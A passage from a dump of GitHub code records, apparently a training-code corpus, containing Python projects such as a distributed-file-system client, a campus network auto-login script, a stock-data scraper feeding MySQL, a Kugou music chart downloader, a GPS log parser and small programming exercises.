requests.post(file_query(file_to), data=file)\n return 'OK'\n\n\ndef open_directory(path_to_directory):\n global current_directory\n if path_to_directory == '..':\n if '/' in current_directory:\n path_to_directory = current_directory[:current_directory.rfind('/')]\n else:\n current_directory = ''\n return 'OK'\n\n request = make_request(requests.get, info_query(path_to_directory))\n if (request == 'No result found') or (request == 'Some error occurred'):\n return request\n current_directory = path_to_directory\n return 'OK'\n\n\ndef read_directory():\n if current_directory == '':\n return make_request(requests.get, info_query('./'))\n return make_request(requests.get, info_query(get_path(current_directory)))\n\n\ndef make_directory(path_to_directory: str):\n return requests.post(file_query(path_to_directory + f'?dir=1')).text\n\n\ndef delete_directory(path_to_directory: str):\n return requests.delete(file_query(path_to_directory + f'?dir=1')).text\n\n\n# -----------------------------------\n# End of commands section\n\ncommands = '''\nfile_name > path/name - creates empty file\nstat file_name - prints file info\ncp from to - copies file\nmv from to - moves file\ncd path - open path\nmkdir path - makes directory\nrmdir path - removes directory\nwrite path_on_computer path_on_server - upload to server\nread path_on_server path_on_computer - reads to pc\nrm path - deletes file on server\n'''\n\nif __name__ == '__main__':\n print('Client for DFS started!')\n try:\n print(initialize().text)\n except requests.ConnectionError:\n print(f'DFS is not running on host `{HOST}:{PORT}`. Please, check your configuration.')\n print('Exiting...')\n exit(0)\n\n print('DFS is running and ready to use, good luck :)')\n print()\n print('Please, type in the command. Type `help` for the list of available commands')\n\n while True:\n command = input()\n\n if command == 'help':\n print(commands)\n elif re.compile(r'(.+)>(.+)').search(command) is not None:\n name, path = re.compile(r'(.+)>(.+)').search(command).groups()\n create_file(name, path)\n elif re.compile(r'stat (.+)').search(command) is not None:\n path = re.compile(r'stat (.+)').search(command).group(1)\n print(info_file(path))\n elif re.compile(r'cp (.+) (.+)').search(command) is not None:\n what, where = re.compile(r'cp (.+) (.+)').search(command).groups()\n print(copy_file(what, where))\n elif re.compile(r'mv (.+) (.+)').search(command) is not None:\n what, where = re.compile(r'mv (.+) (.+)').search(command).groups()\n print(move_file(what, where))\n elif re.compile(r'cd (.+)').search(command) is not None:\n directory = re.compile(r'cd (.+)').search(command).group(1)\n print(open_directory(directory))\n print(f'Current directory: {current_directory}')\n elif re.compile(r'mkdir (.+)').search(command) is not None:\n directory = re.compile(r'mkdir (.+)').search(command).group(1)\n print(make_directory(directory))\n elif re.compile(r'rmdir (.+)').search(command) is not None:\n directory = re.compile(r'rmdir (.+)').search(command).group(1)\n print(delete_directory(directory))\n elif re.compile(r'write (.+) (.+)').search(command) is not None:\n what, where = re.compile(r'write (.+) (.+)').search(command).groups()\n print(write_file(what, where))\n elif re.compile(r'read (.+) (.+)').search(command) is not None:\n what, where = re.compile(r'read (.+) (.+)').search(command).groups()\n print(read_file(what, where))\n elif re.compile(r'rm (.+)').search(command) is not None:\n what = re.compile(r'rm (.+)').search(command).group(1)\n print(delete_file(what))\n elif command == 'ls':\n print(read_directory())\n else:\n print(f'There is no command `{command}`! Type `help` for the list of available commands')\n","repo_name":"AntAndTim/distributed-file-system","sub_path":"client/client.py","file_name":"client.py","file_ext":"py","file_size_in_byte":7361,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"14305125497","text":"import socket\nimport time\n\nimport requests\nimport retrying\nfrom loguru import logger\n\nDEFAULT_CONFIGS = {\n 'ip-ping': 'www.baidu.com',\n 'header': {\n \"User-Agent\": \"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/59.0.3071.115 Safari/537.36\"\n },\n 'zone': {\n 'office': 'https://drcom.szu.edu.cn',\n 'dormitory': 'http://172.30.255.2/0.htm'\n }\n}\n\n\nclass DisconnectError(Exception):\n pass\n\n\ndef disconnect_error(exception):\n return isinstance(exception, ZeroDivisionError)\n\n\nclass Connector:\n def __init__(self, config, log_printer=None):\n self.run_flag = False\n self.set_logger(log_printer)\n self.set_config(config)\n\n @staticmethod\n def set_logger(log_printer):\n log_fmt = \"{time:YYYY-MM-DD | HH:mm:ss} | {level} | {message}\"\n if log_printer is not None:\n logger.add(log_printer, level=\"DEBUG\", format=log_fmt)\n else:\n logger.add('auto-connect.log', level=\"DEBUG\", format=log_fmt)\n logger.info(\"Auto-Connect Init\")\n\n def set_config(self, config: dict):\n try:\n self.headers = DEFAULT_CONFIGS['header']\n self.login_url = DEFAULT_CONFIGS['zone'][config['zone']]\n self.ping_ip = DEFAULT_CONFIGS['ip-ping']\n self.data_send = {\n \"DDDDD\": f\"{config['username']}\",\n \"upass\": f\"{config['password']}\",\n \"R1\": \"0\",\n \"R2\": \"\",\n \"R6\": \"0\",\n \"para\": \"00\",\n \"OMKKey\": \"123456\"\n }\n self.interval = config['interval']\n print_config = config\n # hide password\n print_config['password'] = config['password'][:2] + '***' + config['password'][-2:]\n logger.info(f\"Auto-Connect Load config {print_config}\")\n except KeyError as e:\n logger.error(f'Please check the config, {e}')\n\n def connect(self):\n # requests.packages.urllib3.disable_warnings()\n session = requests.session()\n r = session.post(self.login_url, headers=self.headers, data=self.data_send, verify=False)\n logger.info(\"Posted\")\n # print(r.text)\n\n # def check_connect(self):\n # s = socket.socket()\n # s.settimeout(3)\n # try:\n # status = s.connect_ex((self.ping_ip, 443))\n # if status == 0:\n # s.close()\n # logger.info(\"Connected\")\n # return True\n # else:\n # logger.info(\"Disconnected\")\n # raise DisconnectError\n # # return False\n # except Exception as e:\n # logger.error(f'Find Error in check connect, {e}')\n # raise DisconnectError\n\n def check_connect(self):\n timeout = 5\n try:\n ping_ip = \"https://\" + self.ping_ip\n request = requests.get(ping_ip, timeout=timeout)\n logger.info(\"Connected\")\n return True\n # except (requests.ConnectionError, requests.Timeout) as e:\n except Exception as e:\n logger.error(f'Disconnected, Error [{e}]')\n raise DisconnectError\n\n def stop(self):\n logger.info(\"Stop\")\n self.run_flag = False\n\n @retrying.retry(retry_on_exception=disconnect_error)\n def run(self):\n logger.info('Start Run')\n try:\n self.check_connect()\n except DisconnectError:\n self.connect()\n except Exception as e:\n logger.error(f'Find Error when running: {e}')\n raise DisconnectError\n finally:\n # double check\n self.check_connect()\n\n def loop(self):\n self.run_flag = True\n while self.run_flag:\n self.run()\n time.sleep(60)\n","repo_name":"ackness/szu-autoconnect","sub_path":"szu_autoconnect/core/auto.py","file_name":"auto.py","file_ext":"py","file_size_in_byte":3829,"program_lang":"python","lang":"en","doc_type":"code","stars":25,"dataset":"github-code","pt":"54"} +{"seq_id":"34002214647","text":"import datetime\nimport socket\nimport json\nimport time\nimport traceback\nfrom threading import Thread\n\nclass CommandListener:\n\n def __init__(self, local_ip_address: str, listener_port: int, write_function, read_function):\n self.write_function = write_function\n self.read_function = read_function\n for a in range(1, 4):\n try:\n self.socket = socket.socket()\n self.socket.bind((local_ip_address, listener_port))\n print(\"Web socket listener registered on port: \" + str(listener_port))\n break\n except Exception as e:\n self.socket.close()\n print(e)\n print(\"trying to establish a socket. --\" + str(a))\n time.sleep(5)\n if a == 3:\n raise e\n self.listening_thread = Thread(target=self.__start_listening)\n self.listening = False\n\n def start_listening(self):\n self.listening = True\n self.listening_thread.start()\n print(\"Web socket is listening for commands.\")\n\n def stop_listening(self):\n self.listening = False\n\n def __start_listening(self):\n self.socket.listen()\n while self.listening:\n try:\n c, addr = self.socket.accept()\n data = c.recv(2048)\n if data:\n data = json.loads(data.decode())\n t = datetime.datetime.now()\n print(f\"Connection: {addr}\\t {t.strftime('%Y-%m-%d')}\\t {t.strftime('%H:%M:%S')}\")\n print(data)\n print(\"----------\")\n if data[\"mode\"] == \"write\":\n Thread(target=self.write_function, args=(data,)).start()\n c.close()\n elif data[\"mode\"] == \"read\":\n Thread(target=self.__wait_for_response, args=(c, data,)).start()\n else:\n c.close()\n except Exception as e:\n print(\"ERROR:\")\n traceback.print_exc()\n except KeyboardInterrupt:\n print(\"application is forced to stop.\")\n exit(0)\n\n def __wait_for_response(self, c: socket, data):\n c.send(json.dumps(self.read_function(data)).encode())\n c.close()","repo_name":"lypoluz/modular-smart-home","sub_path":"Backend/commandListener.py","file_name":"commandListener.py","file_ext":"py","file_size_in_byte":2349,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"31554443773","text":"from collections import deque\n# 처음 문제를 접근할 때는 DFS를 활용하여 진행하였음. 하지만 여러 테스트 케이스에서 문제점이 발견됨\n# BFS를 활용하여 문제를 해결하였음. \n\ndef next_step(maps, p):\n nexts = deque()\n n = len(maps) # row size\n m = len(maps[0]) # col size\n\n # (down, right, up, left)\n for t in [(1, 0), (0, 1), (-1, 0), (0, -1)]:\n if 0 <= p[0] + t[0] < n and 0 <= p[1] + t[1] < m:\n if maps[p[0]+t[0]][p[1]+t[1]] == 1:\n nexts.append((p[0]+t[0], p[1]+t[1]))\n\n return nexts\n\n\ndef solution(maps):\n answer = -1\n n = len(maps)\n m = len(maps[0])\n\n end = (n-1, m-1)\n begin = (0, 0)\n maps[0][0] = 0\n begin_item = [begin, 1] # [point, cnt]\n\n q = deque([begin_item])\n while q:\n current, cnt = q.popleft()\n\n if current == end:\n return cnt\n\n nxts = next_step(maps, current)\n for nxt in nxts:\n q.append([nxt, cnt+1])\n maps[nxt[0]][nxt[1]] = 0\n\n return answer","repo_name":"ChanHoLee275/programmers-coding-test-practice","sub_path":"level2/게임-맵-최단거리.py","file_name":"게임-맵-최단거리.py","file_ext":"py","file_size_in_byte":1046,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"3810507508","text":"import requests, pymysql, re, datetime\nimport pandas as pd\nfrom bs4 import BeautifulSoup\nfrom sqlalchemy import create_engine\n\nheaders = {\n 'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.193 Safari/537.36'\n}\n\n\ndef DownStockCode():\n print('开始获取上证、深证股票代码')\n count = 0\n stockcodeList=[]\n urlList = ['https://www.banban.cn/gupiao/list_sh.html','https://www.banban.cn/gupiao/list_sz.html']\n for url in urlList:\n res = requests.get(url=url,headers=headers)\n bs_res = BeautifulSoup(res.text,'html.parser')\n stocklist=bs_res.find('div',id='ctrlfscont').find_all('li')\n for stock in stocklist:\n stockhref=stock.find('a')['href']\n list_stockhref=stockhref.strip().split('/')\n stock_code=list_stockhref[2]\n stockcodeList.append(stock_code)\n count += 1\n print('当前已获取{}只股票代码'.format(count),end='\\r')\n print('已获取所有上证、深证股票代码:{}个'.format(len(stockcodeList)))\n return stockcodeList\n\n\ndef DownStockZSCode():\n print('开始获取上证指数、深证指数代码')\n\n\n\n\ndef CreateDatabase(host,user,password,dbname):\n db = pymysql.connect(\n host = host,\n user = user,\n password = password,\n port = 3306\n )\n cursor = db.cursor()\n sql = 'create database if not exists '+ dbname\n cursor.execute(sql)\n db.close()\n print('检查/创建本地存储数据库-STOCK')\n\n#根据股票代码,创建添加股票数据表,用于存储每只股票数据,table:s_600001\ndef CreateTable(host,user,password,dbname,codeList):\n print('开始检查/添加股票数据表')\n db = pymysql.connect(\n host = host,\n user = user,\n password = password,\n database = dbname,\n charset=\"utf8\"\n )\n cursor = db.cursor()\n count = len(codeList)\n num = 0\n for code in codeList:\n num += 1\n sql = 'create table if not exists s_'+code+'(\\\n stockName varchar(250) not null,\\\n dateTime varchar(250) not null, \\\n startPrice varchar(100), \\\n maxPrice varchar(100), \\\n minPrice varchar(100), \\\n endPrice varchar(100), \\\n diffPrice varchar(100), \\\n diffPercent varchar(100), \\\n turnoverAmount varchar(100), \\\n amount varchar(100), \\\n amplitude varchar(100), \\\n turnoverPercent varchar(100)) DEFAULT CHARSET=utf8'\n cursor.execute(sql)\n print('检查/添加数据库表:s_{},{}/{}'.format(code,num,count),end='\\r')\n db.close()\n\n print('数据库表已检查/添加完毕!!')\n\n#获取所有表名,遍历每个表并获取最新行情数据日期返回列表:[[股票代码,最新数据日期],['600001','2020-12-3'],['600002','NULL']]\ndef GetNearestDate(host,user,password,dbname):\n print('开始获取数据库表内股票的最后交易日期')\n count_empty = 0 #用于记录空表数量\n tablelist = [] #存储获取到的数据库表名\n nearestdatelist = []#存储股票代码和最新行情日期\n db = pymysql.connect(\n host = host,\n user = user,\n password = password,\n database = dbname,\n charset=\"utf8\"\n )\n cursor = db.cursor()\n sql_showtables = 'show tables'\n cursor.execute(sql_showtables) #查询表名\n for i in cursor:\n tablelist.append(str(i)) #表名存储到列表\n for tablename in tablelist:\n code = re.sub('\\D','',tablename)#取出表名中的数字,即股票代码code\n sql_s_dateTime = 'select * from s_'+code+' order by dateTime desc limit 1' #取出数据表最后一行记录\n lastrow = pd.read_sql(sql_s_dateTime,db)\n if lastrow.empty:\n dateTime = 'Null'\n count_empty += 1\n else:\n dateTime = lastrow['dateTime'][0]\n nearestdatelist.append([code,dateTime])\n print('已获取:{} 的最后交易日期为:{} 当前获取进度:{}/{} '.format(code,dateTime,len(nearestdatelist),len(tablelist)), end='\\r')\n db.close()\n print('个股最后交易日期获取完毕,共计{}只股票,其中需下载全部数据的股票共{}只'.format(len(nearestdatelist),count_empty))\n return nearestdatelist\n\n\n#读取数据库表,根据读取结果更新下载股票数据— 交易日为NULL,下载全部数据;交易日为最新,跳过;交易日非最新交易日,更新数据\ndef UpdateAndDown(host,user,password,dbname,new_date):\n count_downall = 0 #记录需下载全部历史数据的个股数量\n count_update = 0 #记录需更新数据的个股数量\n count_all = 0 #记录已遍历数据库的个股数量\n stocklist = GetNearestDate(host,user,password,dbname)\n stocknum = len(stocklist)\n for stock in stocklist:\n count_all += 1\n print('股票数据爬取进度{}/{} 正在更新数据库表:s_{}'.format(count_all,stocknum,stock[0]),end='\\r')\n if stock[1] == 'Null': #如果个股最近数据日期为空,则下载全部股票数据到数据库\n stockdata = DownAllData(stock[0])\n count_downall +=1\n elif stock[1] == new_date: #若个股最近数据日期是最新交易额日期,则跳过\n continue\n else:\n stockdata = UpdateData(stock[0],stock[1])#若个股最近数据日期不为空,则更新数据库数据\n count_update +=1\n df = pd.DataFrame(stockdata,columns=['stockName','dateTime','startPrice','maxPrice','minPrice','endPrice','diffPrice','diffPercent','turnoverAmount','amount','amplitude','turnoverPercent'])\n engine = create_engine('mysql+pymysql://'+user+':'+password+'@'+host+':'+'3306/'+dbname)\n tablename = 's_'+stock[0]\n df.to_sql(\n name = tablename,\n con = engine,\n index = False,\n if_exists = 'append')\n print('股票数据全部下载完毕!下载全部数据股票数:{}只,更新数据股票数:{}只'.format(count_downall,count_update))\n\n\n\ndef GetSeason(month):\n month = int(month)\n if month >= 1 and month <= 3:\n season = 1\n elif month >= 4 and month <= 6:\n season = 2\n elif month >= 7 and month <= 9:\n season = 3\n else:\n season = 4\n return season\n\n\n\n#若是空��,下载该股全部历史行情数据,返回:stockName-股票名字,stockdate-股票历史数据列表\ndef DownAllData(code):\n yearlist = [] #用于存储个股有数据的年份\n pagelist = [] #用于存储构造好的待爬取页面链接\n stockdate = [] #用于存储爬取到的股票数据\n url = 'http://quotes.money.163.com/trade/lsjysj_'+code+'.html?'\n res = requests.get(url = url,headers = headers)\n bs_res = BeautifulSoup(res.text,'html.parser')\n stockName = bs_res.find('div',class_='stock_info').find('h1',class_='name').find('a').text\n item = bs_res.find('form',id = 'date').find_all('option') #获取股票有数据的年份和季度\n now_dateTime = datetime.datetime.now().date()#获取当前日期\n now_year = now_dateTime.year\n now_month = now_dateTime.month\n now_season = GetSeason(now_month)\n for i in item[:-4]: #仅取出年份存入列表\n yearlist.append(i.text)\n for year in yearlist: #构造待爬取页面链接\n if int(year) == now_year: #若为当前年,按实际所在季度来构造链接数量,考虑当前日期所在季度不一定是第4季度的情况\n for i in range(now_season):\n season = now_season - i\n url_page = 'http://quotes.money.163.com/trade/lsjysj_'+code+'.html?year='+str(year)+'&season='+str(season)\n pagelist.append(url_page)\n else:\n for s in range(4): #非当前年将构造全部季度链接\n url_page = 'http://quotes.money.163.com/trade/lsjysj_'+code+'.html?year='+str(year)+'&season='+str(4-s)\n pagelist.append(url_page)\n for page in pagelist:\n res = requests.get(url = page,headers = headers)\n bs_res = BeautifulSoup(res.text,'html.parser')\n pageinfo = bs_res.find('table',class_='table_bg001').find_all('tr')\n flag = 0\n for row in pageinfo:\n if flag:\n rowData = row.find_all('td') #提取每一行所有td标签内容\n rowData_List = [] #用于存储取出的td标签内容\n for td in rowData:\n rowData_List.append(td.text)\n dateTime = rowData_List[0]#开盘日期\n startPrice = rowData_List[1]#开盘价\n maxPrice = rowData_List[2]#最高价\n minPrice = rowData_List[3]#最低价\n endPrice = rowData_List[4]#收盘价\n diffPrice = rowData_List[5]#涨跌额\n diffPercent = rowData_List[6]#涨跌幅\n turnoverAmount = rowData_List[7]#成交量\n amount = rowData_List[8]#成交额\n amplitude = rowData_List[9]#振幅\n turnoverPercent = rowData_List[10]#换手率\n stockdate.append([stockName,dateTime,startPrice,maxPrice,minPrice,endPrice,diffPrice,diffPercent,turnoverAmount,amount,amplitude,turnoverPercent])\n else:\n flag = 1\n stockdate.reverse() #将排列顺序倒置,旧在前、新在后\n return stockdate\n\n\n\n#若表不为空,则根据最后一条记录的开盘日期更新至实际最新日期数据,返回:股票名-stockName,股票待更新数据-stockdate\ndef UpdateData(code,dateTime):\n stockdata = [] #用于存储爬取到的股票数据\n dateTime = datetime.datetime.strptime(dateTime,'%Y-%m-%d').date()\n nowTime = datetime.datetime.now().date()#获取当前日期、年、月、季\n now_year = nowTime.year\n now_month = nowTime.month\n now_season = GetSeason(now_month)\n y = now_year #用于下文构造链接时控制年份\n s = now_season #用于下文构造链接时控制季度\n flag = 1 #控制循环\n while flag: #构造链接、爬取数据\n url = 'http://quotes.money.163.com/trade/lsjysj_'+code+'.html?year='+str(y)+'&season='+str(s)\n res = requests.get(url = url,headers = headers)\n bs_res = BeautifulSoup(res.text,'html.parser')\n stockName = bs_res.find('div',class_='stock_info').find('h1',class_='name').find('a').text\n pageinfo = bs_res.find('table',class_='table_bg001').find_all('tr')\n f = 0 #控制跳过股票数据第一行表头\n for row in pageinfo:\n if f:\n rowData = row.find_all('td') #提取每一行所有td标签内容\n rowData_List = [] #用于存储取出的td标签内容\n for td in rowData:\n rowData_List.append(td.text)\n dateTime_ = rowData_List[0]#开盘日期\n startPrice = rowData_List[1]#开盘价\n maxPrice = rowData_List[2]#最高价\n minPrice = rowData_List[3]#最低价\n endPrice = rowData_List[4]#收盘价\n diffPrice = rowData_List[5]#涨跌额\n diffPercent = rowData_List[6]#涨跌幅\n turnoverAmount = rowData_List[7]#成交量\n amount = rowData_List[8]#成交额\n amplitude = rowData_List[9]#振幅\n turnoverPercent = rowData_List[10]#换手率\n if dateTime < datetime.datetime.strptime(dateTime_,'%Y-%m-%d').date(): #仅提取参数日前之后的行数据\n stockdata.append([stockName,dateTime_,startPrice,maxPrice,minPrice,endPrice,diffPrice,diffPercent,turnoverAmount,amount,amplitude,turnoverPercent])\n else:\n flag = 0 #如果行数据日期等于参数日期,则跳出while\n break\n else:\n f = 1\n s -= 1 #如果当前页数据日期均晚于参数日期,则季度向前推1,继续构造上一季度链接进行爬取\n if s == 0: #如果季度向前推到了0,则恢复为4,年度减1\n s = 4\n y -= 1\n stockdata.reverse() #顺序倒置,旧在前,新在后\n return stockdata\n\n\n#根据股票代码,创建添加股票数据表,用于存储每只股票数据,table:s_600001\ndef CreateTable1(host,user,password,dbname,):\n print('开始检查/添加股票数据表')\n db = pymysql.connect(\n host = host,\n user = user,\n password = password,\n database = dbname,\n charset=\"utf8\"\n )\n cursor = db.cursor()\n\n num = 0\n code = 'qqq12313123'\n sql = \"create table if not exists s_\" + code + \"(\\\n stockName varchar(250) not null comment '1231',\\\n dateTime varchar(250) not null, \\\n startPrice varchar(100), \\\n maxPrice varchar(100), \\\n minPrice varchar(100), \\\n endPrice varchar(100), \\\n diffPrice varchar(100), \\\n diffPercent varchar(100), \\\n turnoverAmount varchar(100), \\\n amount varchar(100), \\\n amplitude varchar(100), \\\n turnoverPercent varchar(100)) DEFAULT CHARSET=utf8\"\n cursor.execute(sql)\n # print('检查/添加数据库表:s_{},{}/{}'.format(code,num,count),end='\\r')\n db.close()\n\n print('数据库表已检查/添加完毕!!')\n\n\nif __name__ == '__main__':\n #获取股票代码\n stockcodeList = DownStockCode()\n #数据库检查\n CreateDatabase('127.0.0.1', 'root', '', 'Ticker')\n CreateTable('127.0.0.1', 'root', '', 'Ticker',stockcodeList)\n #爬取数据\n today = datetime.datetime.now()\n str_date = today.strftime(\"%Y-%m-%d\")\n UpdateAndDown('127.0.0.1', 'root', '', 'Ticker',str_date)\n\n\n","repo_name":"caichongbo/LH","sub_path":"getdata/getTickers.py","file_name":"getTickers.py","file_ext":"py","file_size_in_byte":13950,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"28459429368","text":"\"\"\"\r\nCrear un programa que guarde en una variable el \r\ndiccionario {'Euro':'€', 'Dollar':'$', 'Yen':'¥'}, pregunte al \r\nusuario por una divisa y muestre su símbolo o un mensaje de \r\naviso si la divisa no está en el diccionario.\r\n\"\"\"\r\n\r\ndivisas = {\r\n 'Euro': '€', \r\n 'Dollar':'$', \r\n 'Yen':'¥'\r\n}\r\n\r\n# lowercase el input del usuario\r\ndivisa_input = input('Ingresa una divisa: ').casefold()\r\n# uppercase la primera letra y concatena el resto del string tal cual está\r\ndivisa_input = divisa_input[0].upper() + divisa_input[1:]\r\n\r\nif divisa_input in divisas:\r\n print(divisas[divisa_input])\r\nelse:\r\n print('Divisa no encontrada') ","repo_name":"GuadaIt/python-exercises","sub_path":"13.py","file_name":"13.py","file_ext":"py","file_size_in_byte":652,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"40827463007","text":"#!venv/bin/python3\n# -*- coding: utf-8 -*-\n__author__ = \"Benjamin Trubert, Kévin Huguenin, Alpha Diallo, Lev Velykoivanenko, Noé Zufferey\"\n__copyright__ = \"Copyright 2021, The Information Security and Privacy Lab at the University of Lausanne (\" \\\n \"https://www.unil.ch/isplab/)\"\n__credits__ = [\"Benjamin Trubert\", \"Kévin Huguenin\", \"Alpha Diallo\", \"Lev Velykoivanenko\", \"Noé Zufferey\",\n \"Vaibhav Kulkarni\"]\n\n__version__ = \"1\"\n__license__ = \"MIT\"\n__maintainer__ = \"Kévin Huguenin\"\n__email__ = \"kevin.huguenin@unil.ch\"\n\nfrom location import *\nimport re\nfrom datetime import datetime, timezone, timedelta\n\n\nclass LogsLocationProvider(ListLocationProvider):\n\n def __init__(self, log_file: str):\n # L'attribut contenant le nom du fichier est privé et l'attribut\n # __samples est hérité de ListLocationProvider\n self.__file = log_file\n samples = []\n try:\n f = open(log_file)\n lines = f.readlines()\n for l in lines:\n line = l.strip('\\n')\n if line.find(\"source: GPS\") != -1: # garder seulement les coordonnées GPS\n t, lat, lng = LogsLocationProvider._extract_location_sample_from_log(line)\n if not (t is None or lat is None or lng is None):\n loc = LocationSample(t, Location(lat, lng))\n samples.append(loc)\n except FileNotFoundError as e:\n if Configuration.get_instance().get_element('verbose'):\n print(\"Impossible de trouver le fichier donné.\")\n super().__init__(samples)\n\n def __str__(self):\n return \"LogsLocationProvider (\" + str(self.__file) + \", \" + str(\n len(self.get_location_samples())) + \" location samples)\"\n\n # LogsLocationProvider (source: ../data/logs/jdoe.log, 2 location samples)\n\n @staticmethod\n def _extract_location_sample_from_log(log: str):\n \"\"\"\n Returns the time, latitude, and longitude, if available, from a given\n log.\n\n Returns\n -------\n The extracted time, latitude, and longitude.\n \"\"\"\n\n (t, lat, lng) = (None, None, None)\n\n start = log.find(\"[\")\n end = log.find(\"]\")\n date_line = log[start + 1:end]\n # gérer les UNKNOWNS\n t = datetime.strptime(date_line, \"%Y-%m-%dT%H:%M:%S.%f\")\n # remove [] substring\n line = log.split(\"]\")[1]\n pair = re.findall(r\"[-+]?\\d*\\.\\d+|\\d+\", line)\n if not len(pair) == 0:\n lat = float(pair[0])\n lng = float(pair[1])\n return t, lat, lng\n\n\nif __name__ == '__main__':\n # Tester l'implémentation de cette classe avec les instructions de ce bloc\n # main (le résultat attendu est affiché ci-dessous).\n\n lp = LogsLocationProvider('../data/logs/hschmidt.log')\n #print(lp)\n print(lp.get_surrounding_temporal_location_samples(\n datetime.strptime('2021-04-08 09:16:23', '%Y-%m-%d %H:%M:%S').replace(tzinfo=timezone(timedelta(hours=2)))))\n lp.show_location_samples()\n lp.print_location_samples()\n\n ### Résultat attendu ###\n\n # LogsLocationProvider (source: ../data/logs/hschmidt.log, 3 location samples)\n # LocationSample [datetime: 2021-04-08 09:16:21+02:00, location: Location [latitude: 46.52334, longitude: 6.57551]]\n # LocationSample [datetime: 2021-04-08 09:23:04+02:00, location: Location [latitude: 46.52475, longitude: 6.58057]]\n # LocationSample [datetime: 2021-04-08 09:27:18+02:00, location: Location [latitude: 46.52199, longitude: 6.58423]]\n","repo_name":"emilio-gambino/Sherlock","sub_path":"skeleton/logs.py","file_name":"logs.py","file_ext":"py","file_size_in_byte":3586,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"5946816675","text":"# Write a Python Function to multiply all the values in \n# a dictionary.Take Dcitionary as parameter of functions\n\n\ndef multiplyDict(dict):\n result = 1\n for x in dict.values():\n result = result * x\n print(result)\n \ndict={\"a\":2,\"b\":6,\"c\":5}\nmultiplyDict(dict)","repo_name":"MuhammadAnas14/Python-Course-Project-Vendors","sub_path":"Practice Problem 2 Solution/Question7.py","file_name":"Question7.py","file_ext":"py","file_size_in_byte":281,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"37468400762","text":"# -*- coding: utf-8 -*-\nfrom bs4 import BeautifulSoup as bs\nimport requests\nfrom selenium import webdriver\nimport time\n# #此项目为爬取酷狗排行榜并批量下载的python项目\ndef down(url):\n option = webdriver.ChromeOptions()\n option.add_argument(\"headless\")\n browser = webdriver.Chrome('E:\\python\\Scripts\\chromedriver.exe', chrome_options=option)\n browser.get(url)#仍以阿衣莫为例\n response=browser.page_source\n audiutl=browser.find_element_by_id('myAudio')\n time.sleep(2)\n print('*****************'+audiutl.get_property('src'))\n return audiutl.get_property('src')\n\n #browser.close()#关闭浏览器其他应用\n#*****************************************************************************************************************************************\n#此方法为爬取歌曲信息:\nsong_list_info=[]#存放全部歌曲列表\nsong_download_url=[]#经过筛选处理后得到的真正的歌曲下载链接\nheaders={\n 'user-agent':'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/94.0.4606.54 Safari/537.36'\n}#公用请求头\ndef SongInformation(page):\n urls='https://www.kugou.com/yy/rank/home/'+page+'-8888.html'\n\n re=requests.get(url=urls,headers=headers)\n #save=re.content.decode('utf-8')\n save=re.text\n if save!=None:\n soup=bs(save,'html.parser')\n rank=soup.select('span.pc_temp_num')#歌曲排名\n musichref=soup.select('div.pc_temp_songlist>ul>li>a')\n mhref=[]#歌曲链接\n list=[]# 歌曲信息综合\n singer = []#歌手名字\n songname = []#歌曲名字\n for i in musichref:\n mhref.append(i['href'])#添加歌曲链接\n list.append(i['title'].split(' - ',2))#添加歌曲作者以及歌曲名字\n for i in list:\n songname.append(i[1])\n singer.append(i[0])\n for i,j,k in zip(mhref,songname,singer):\n song_infor = {\n 'url':i,\n 'name':j,\n 'singer':k\n }\n song_list_info.append(song_infor)\n else:\n pass\n#*****************************************************************************************************************************************\ndef KuGouDownload(startpage,endpage):\n for i in range(startpage,endpage):\n try:\n print('正在存储第'+str(i+1)+'页歌曲信息')\n SongInformation(str(i+1))\n print('第'+str(i+1)+'页歌曲信息存储成功')\n time.sleep(1)\n except:\n print('第'+str(i+1)+'页歌曲信息存储失败,已跳过当前页')\n for i in song_list_info:\n print(i['name'] + '下载地址:')\n z=down(i['url'])\n #print('************'+z)\n #z=song_download_url.append(down(i['url']))\n with open(\"D:\\KugouSpider\\下载音乐\\{}.mp3\".format(i[\"name\"]), 'wb') as f:\n mp3 = requests.get(z, headers=headers).content\n f.write(mp3)\n print('歌曲已下载完毕')\n#********************************************************************************************************************************************\ndef main():\n try:\n a=input('请输入下载开始页数(默认为从第一页开始下载):')\n if a==''or a=='1':\n a=0\n else:\n a=int(a)\n b=input('请输入下载结束页数(最大为23):')\n b=int(b)\n #if b>23\n print(\"您想要下载第\"+str(a)+'至第'+str(b)+'页')\n print('即将开始下载,请勿关机或者停止程序!')\n KuGouDownload(a,b)\n print('音乐已下载完毕,祝君开心。')\n except:\n print('您输入的信息有误,请重新运行此程序。')\nif __name__ == '__main__':\n main()","repo_name":"ZhuMengMeng666/KugouSpider","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":3800,"program_lang":"python","lang":"zh","doc_type":"code","stars":2,"dataset":"github-code","pt":"54"} +{"seq_id":"23204078520","text":"######################################################################################\n# Eduardo Moura Cirilo Rocha, mouracirilor@wisc.edu\n# March of 2019\n# t-test\n######################################################################################\n\nimport json\nimport numpy as np \nimport sys\nimport math\n\nfrom random import shuffle\nfrom bayes_function import bayes\n\n\ntrainingSetPath = \"../datasets/tic-tac-toe.json\"\ntestSetPath = \"../datasets/tic-tac-toe.json\"\n\n# Load data\nwith open(trainingSetPath) as f:\n trainSet = json.load(f)\n# Load test set\nwith open(testSetPath) as f:\n testSet = json.load(f)\nData = trainSet[\"data\"]\nfoldSize = round((len(Data))/10)\n\n# randomly shuffle data before separating folds\nshuffle(Data)\n\n# Print file header\nprint(\"TAN NaiveBayes\")\n\n# create fold and apply classifier\nfor i in range(10):\n\ttestData = []\n\ttrainingData = 